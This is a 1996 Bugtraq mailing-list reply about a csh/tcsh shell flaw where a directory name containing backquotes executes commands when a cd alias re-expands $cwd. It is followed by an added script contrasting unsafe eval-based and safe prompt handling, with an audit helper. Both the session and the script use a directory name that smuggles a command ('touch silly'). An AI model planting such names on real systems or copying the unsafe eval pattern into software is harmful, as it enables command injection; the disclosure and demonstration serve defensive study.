[3375] in bugtraq


Re: tee see shell problems

daemon@ATHENA.MIT.EDU (Paul Szabo)
Tue Sep 17 21:21:44 1996

Date: 	Wed, 18 Sep 1996 10:44:09 +1000
Reply-To: Paul Szabo <szabo_p@MATHS.SU.OZ.AU>
From: Paul Szabo <szabo_p@MATHS.SU.OZ.AU>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>

> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with backticks.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz@maths.usyd.edu.au         //   University of Sydney, NSW 2006, Australia
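
The re-scanning described in the message above, as an added example that is not part of the original post. POSIX sh does not re-parse alias text the way csh does, so eval is used here as a stand-in (an assumption of this sketch) for the second pass over the substituted $cwd, next to a prompt function that treats the name as data. The function names and the temporary directories are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post. eval models the second parsing
# pass that csh applies to the alias text after $cwd has been substituted.

# Unsafe pattern: the last component of the working directory is pasted into
# a string that the shell parses again, so backquotes in the name execute.
prompt_rescanned() {
    eval "printf '%s%% ' \"${PWD##*/}\""
}

# Safe pattern: the name is expanded once and only ever handled as data.
prompt_literal() {
    printf '%s%% ' "${PWD##*/}"
}

# Audit helper: list directories under $1 whose names contain a backquote
# or a dollar sign, the characters that trigger substitution when re-parsed.
find_risky_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$*' \) -print
}

# Build a scratch directory with the name used in the post, enter it,
# call the prompt function named in $1, and report "<prompt>|<ran|inert>"
# depending on whether the embedded "touch silly" was executed.
demo() {
    work=$(mktemp -d) || return 1
    name='`echo you lose; touch silly`'   # constructed, same as the post
    mkdir "$work/$name"
    prompt=$(cd "$work/$name" && "$1")
    if [ -e "$work/$name/silly" ]; then side=ran; else side=inert; fi
    rm -rf "$work"
    printf '%s|%s\n' "$prompt" "$side"
}

demo prompt_rescanned   # you lose% |ran
demo prompt_literal     # `echo you lose; touch silly`% |inert
```
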
